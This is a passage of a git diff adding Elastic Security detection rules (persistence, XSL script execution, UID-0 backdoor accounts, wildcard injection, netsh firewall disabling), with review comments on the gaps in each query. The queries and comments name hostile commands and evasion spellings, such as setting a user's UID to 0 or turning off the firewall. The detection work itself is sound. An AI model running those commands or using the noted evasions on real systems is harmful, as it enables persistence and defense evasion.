"type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "48d7f54d-c29e-4430-93a9-9db6b5892270", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.002", + "name": "Screensaver", + "reference": "https://attack.mitre.org/techniques/T1546/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "48d7f54d-c29e-4430-93a9-9db6b5892270_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_106.json b/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_106.json new file mode 100644 index 00000000000..87ad75297c7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/48ec9452-e1fd-4513-a376-10a1a26d2c83_106.json 
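Review bot: The query matches every child of `ScreenSaverEngine` with no exclusion list and the rule carries no `false_positives` entry, while its name promises only unexpected children; if any shipped screensaver or helper on the monitored fleet legitimately spawns a process, this will alert on each activation. Either document the known benign cases in a `false_positives` array (the o365 rule earlier in this diff has one) or state in the triage note that an allowlist is intentionally omitted so the analyst knows what to expect.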
@@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of the default configuration for periodic tasks. Adversaries may abuse periodic tasks to execute malicious code or maintain persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Persistence via Periodic Tasks", + "query": "event.category:file and host.os.type:macos and not event.type:\"deletion\" and\n file.path:(/private/etc/periodic/* or /private/etc/defaults/periodic.conf or /private/etc/periodic.conf)\n", + "references": [ + "https://opensource.apple.com/source/crontabs/crontabs-13/private/etc/defaults/periodic.conf.auto.html", + "https://www.oreilly.com/library/view/mac-os-x/0596003706/re328.html", + "https://github.com/D00MFist/PersistentJXA/blob/master/PeriodicPersist.js" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "48ec9452-e1fd-4513-a376-10a1a26d2c83", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.003", + "name": "Cron", + "reference": "https://attack.mitre.org/techniques/T1053/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "48ec9452-e1fd-4513-a376-10a1a26d2c83_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/48f657ee-de4f-477c-aa99-ed88ee7af97a_2.json b/packages/security_detection_engine/kibana/security_rule/48f657ee-de4f-477c-aa99-ed88ee7af97a_2.json new file mode 100644 index 00000000000..ad33806fd6d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/48f657ee-de4f-477c-aa99-ed88ee7af97a_2.json 
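Review bot: The `file.path` list in the query only covers the `/private/etc/...` spellings; on macOS `/etc` is a symlink to `/private/etc`, so a writer that opens `/etc/periodic/daily/...` would never match if Elastic Defend reports the path as opened rather than canonicalised. Worth confirming how Defend reports the path here and, if it is not canonicalised, adding `/etc/periodic/*`, `/etc/defaults/periodic.conf` and `/etc/periodic.conf` to the list. The description says "creation or modification" while the query is `not event.type:"deletion"`, which is broader; the description could say the rule alerts on any non-deletion file event on these paths.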
@@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a hosted XSL script using the Microsoft.XMLDOM COM interface via Microsoft Office processes. This behavior may indicate adversarial activity to execute malicious JScript or VBScript on the system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote XSL Script Execution via COM", + "query": "sequence with maxspan=1m\n [library where host.os.type == \"windows\" and dll.name : \"msxml3.dll\" and\n process.name : (\"winword.exe\", \"excel.exe\", \"powerpnt.exe\", \"mspub.exe\")] by process.entity_id\n [process where host.os.type == \"windows\" and event.action == \"start\" and\n process.parent.name : (\"winword.exe\", \"excel.exe\", \"powerpnt.exe\", \"mspub.exe\") and \n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWoW64\\\\WerFault.exe\",\n \"?:\\\\windows\\\\splwow64.exe\",\n \"?:\\\\Windows\\\\System32\\\\conhost.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*exe\")] by process.parent.entity_id\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "48f657ee-de4f-477c-aa99-ed88ee7af97a", + "severity": "low", + 
"tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1220", + "name": "XSL Script Processing", + "reference": "https://attack.mitre.org/techniques/T1220/" + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "48f657ee-de4f-477c-aa99-ed88ee7af97a_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_6.json b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_6.json new file mode 100644 index 00000000000..de6bf70a3f4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/494ebba4-ecb7-4be4-8c6f-654c686549ad_6.json 
@@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the attempt to create a new backdoor user by setting the user's UID to 0. Attackers may alter a user's UID to 0 to establish persistence on a system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Linux Backdoor User Account Creation", + "note": "## Triage and analysis\n\n### Investigating Potential Linux Backdoor User Account Creation\n\nThe `usermod` command is used to modify user account attributes and settings in Linux-based operating systems.\n\nAttackers may create new accounts with a UID of 0 to maintain root access to target systems without leveraging the root user account.\n\nThis rule identifies the usage of the `usermod` command to set a user's UID to 0, indicating that the user becomes a root account. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n- Investigate the user account that got assigned a uid of 0, and analyze its corresponding attributes.\n - !{osquery{\"label\":\"Osquery - Retrieve User Accounts with a UID of 0\",\"query\":\"SELECT description, gid, gid_signed, shell, uid, uid_signed, username FROM users WHERE username != 'root' AND uid LIKE '0'\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"usermod\" and process.args : \"-u\" and process.args : \"0\" and process.args : \"-o\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "494ebba4-ecb7-4be4-8c6f-654c686549ad", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1136", + "name": "Create Account", + "reference": "https://attack.mitre.org/techniques/T1136/", + "subtechnique": [ + { + "id": "T1136.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1136/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "494ebba4-ecb7-4be4-8c6f-654c686549ad_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_5.json b/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_5.json new file mode 100644 index 00000000000..aff4c58545e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4a99ac6f-9a54-4ba5-a64f-6eb65695841b_5.json 
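Review bot: The query only matches the short-option spelling as three separate argv tokens (`-u`, `0`, `-o`), so `usermod --uid 0 --non-unique user`, `usermod --uid=0 -o user` and the combined form `usermod -ou 0 user` all set UID 0 without firing; adding the long options is cheap: `process.args : ("-u", "--uid", "--uid=0") and process.args : ("-o", "--non-unique")`, keeping the `process.args : "0"` clause for the forms that pass the value separately. The `"0"` test is also position-independent, so `usermod -o -u 1001 -g 0 user` matches on the group argument — a false positive the triage note ("unlikely to happen legitimately") does not anticipate. The description speaks of creating a backdoor user, but `useradd -o -u 0 name` creates one directly and is not covered; either extend to `process.name in ("usermod", "useradd")` or reword the description to say the rule covers modification of an existing account.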
@@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of the \"chown\" and \"chmod\" commands with command line flags that could indicate a wildcard injection attack. Linux wildcard injection is a type of security vulnerability where attackers manipulate commands or input containing wildcards (e.g., *, ?, []) to execute unintended operations or access sensitive data by tricking the system into interpreting the wildcard characters in unexpected ways.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Unauthorized Access via Wildcard Injection Detected", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name in (\"chown\", \"chmod\") and process.args == \"-R\" and process.args : \"--reference=*\"\n", + "references": [ + "https://www.exploit-db.com/papers/33930" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "4a99ac6f-9a54-4ba5-a64f-6eb65695841b", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.008", + "name": "/etc/passwd and /etc/shadow", + "reference": "https://attack.mitre.org/techniques/T1003/008/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "4a99ac6f-9a54-4ba5-a64f-6eb65695841b_5", + "type": "security-rule" +} \ No newline at end of file 
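Review bot: `process.args == "-R"` requires that exact token, so the equally valid `--recursive` long form and combined short flags such as `-Rv` are missed; `process.args in ("-R", "--recursive")` covers the long form while keeping the case-sensitive comparison that stops `chmod -r` (remove read permission) from matching. GNU getopt also accepts `--reference file` as two tokens, which the `--reference=*` glob cannot see — if that gap is accepted, a sentence in the description should say so rather than leave analysts assuming full coverage. The Credential Access / T1003.008 mapping is only indirectly supported (a `--reference` applied to `/etc/shadow` could make it readable); consider whether Privilege Escalation alone is the more defensible tactic for this rule.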
diff --git a/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_109.json b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_109.json new file mode 100644 index 00000000000..a902564c7c6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_109.json 
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the netsh.exe to disable or weaken the local firewall. Attackers will use this command line tool to disable the firewall during troubleshooting or to enable network mobility.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Disable Windows Firewall Rules via Netsh", + "note": "## Triage and analysis\n\n### Investigating Disable Windows Firewall Rules via Netsh\n\nThe Windows Defender Firewall is a native component which provides host-based, two-way network traffic filtering for a device, and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can disable the Windows firewall or its rules to enable lateral movement and command and control activity.\n\nThis rule identifies patterns related to disabling the Windows firewall or its rules using the `netsh.exe` utility.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Check whether the user is an administrator and is legitimately performing troubleshooting.\n- In case of an allowed benign true positive (B-TP), assess adding rules to allow needed traffic and re-enable the firewall.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"netsh.exe\" and\n (\n (process.args : \"disable\" and process.args : \"firewall\" and process.args : \"set\") or\n (process.args : \"advfirewall\" and process.args : \"off\" and process.args : \"state\")\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "4b438734-3793-4fda-bd42-ceeada0be8f9", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline 
to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.004", + "name": "Disable or Modify System Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "4b438734-3793-4fda-bd42-ceeada0be8f9_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_110.json b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_110.json new file mode 100644 index 00000000000..cc3612343f5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4b438734-3793-4fda-bd42-ceeada0be8f9_110.json 
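Review bot: Both branches test for bare tokens, so the documented named-parameter spelling `netsh firewall set opmode mode=disable` (a single argv token `mode=disable`) never satisfies `process.args : "disable"` and slips past; a wildcard, `process.args : ("disable", "*=disable")`, closes that form, and the same consideration may apply to `state off` if a `state=off` spelling is accepted, which I have not verified. The three `process.args` tests per branch are unordered, so any netsh command line whose arguments merely contain `set`, `firewall` and `disable` fires — acceptable at risk 47, but worth a sentence in the false-positive section. This `_109` copy uses `index: logs-endpoint.events.*` whereas the `_110` copy in the same commit narrows it to `logs-endpoint.events.process-*`; presumably intentional version history, but the query text is otherwise identical, so any fix to it has to land in both files.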
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the netsh.exe to disable or weaken the local firewall. Attackers will use this command line tool to disable the firewall during troubleshooting or to enable network mobility.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Disable Windows Firewall Rules via Netsh", + "note": "## Triage and analysis\n\n### Investigating Disable Windows Firewall Rules via Netsh\n\nThe Windows Defender Firewall is a native component which provides host-based, two-way network traffic filtering for a device, and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can disable the Windows firewall or its rules to enable lateral movement and command and control activity.\n\nThis rule identifies patterns related to disabling the Windows firewall or its rules using the `netsh.exe` utility.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
